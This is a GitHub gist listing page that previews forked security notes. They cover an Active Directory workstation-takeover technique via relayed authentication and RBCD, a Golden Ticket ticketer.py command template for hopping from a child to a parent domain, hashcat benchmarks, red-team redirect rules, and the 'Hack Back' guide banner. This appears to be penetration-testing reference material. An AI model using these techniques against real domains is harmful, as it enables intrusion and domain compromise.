Skip to content

Instantly share code, notes, and snippets.

View TAI-REx's full-sized avatar

TAI-REx

49 followers · 618 following
View GitHub Profile
@TAI-REx
TAI-REx / tmux-cheatsheet.markdown
Created July 23, 2022 04:53 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname
@TAI-REx
TAI-REx / Workstation-Takeover.md
Created June 12, 2022 02:42 — forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@TAI-REx
TAI-REx / domainhop.txt
Created April 29, 2022 22:16 — forked from n00py/domainhop.txt
Golden Tickets to hop domains:
Requirements:
Get krbtgt hash from child domain (secretsdump)
Get SID of domain and SID of Enterprise admins group in parent domain (ldapdomaindump/bloodhound)
ticketer.py -nthash
[KRBTGT NT HASH FOR CHILD.PARENT.LOCAL] -domain-sid [SID FOR CHILD.PARENT.LOCAL]
-domain CHILD.PARENT.LOCAL -extra-sid [SID OF ENTERPRISE ADMINS IN PARENT.LOCAL]
[USERNAME IN CHILD.PARENT.LOCAL]
@TAI-REx
TAI-REx / AD-OSCP.md
Created April 29, 2022 20:58 — forked from RajChowdhury240/AD-OSCP.md
Active Directory Attacks OSCP
@TAI-REx
TAI-REx / ActiveDirectory.md
Created March 29, 2022 13:56 — forked from indented-automation/ActiveDirectory.md
Active Directory

A small collection specialised scripts for Active Directory.

Includes:

  • Compare-ADMemberOf
  • Get-ADSystemInfo
  • Get-GroupMemberTree
  • Get-LdapObject
  • Get-MemberOfTree
  • Test-LdapSslConnection
@TAI-REx
TAI-REx / 8x1080.md
Created October 3, 2021 22:16 — forked from epixoip/8x1080.md
8x Nvidia GTX 1080 Hashcat Benchmarks
@TAI-REx
TAI-REx / .htaccess
Created May 19, 2021 00:18 — forked from curi0usJack/.htaccess
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@TAI-REx
TAI-REx / gist:795487b365140e9f853ce17d1ee48c9e
Created March 27, 2021 21:21 — forked from jaredsburrows/gist:9e121d2e5f1147ab12a696cf548b90b0
full English translation of Phineas Fisher's account of how he took down HackingTeam - https://www.reddit.com/r/netsec/comments/4f3e6p/full_english_translation_of_phineas_fishers/
_ _ _ ____ _ _
| | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
| |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
| _ | (_| | (__| < | |_) | (_| | (__| <|_|
|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
A DIY Guide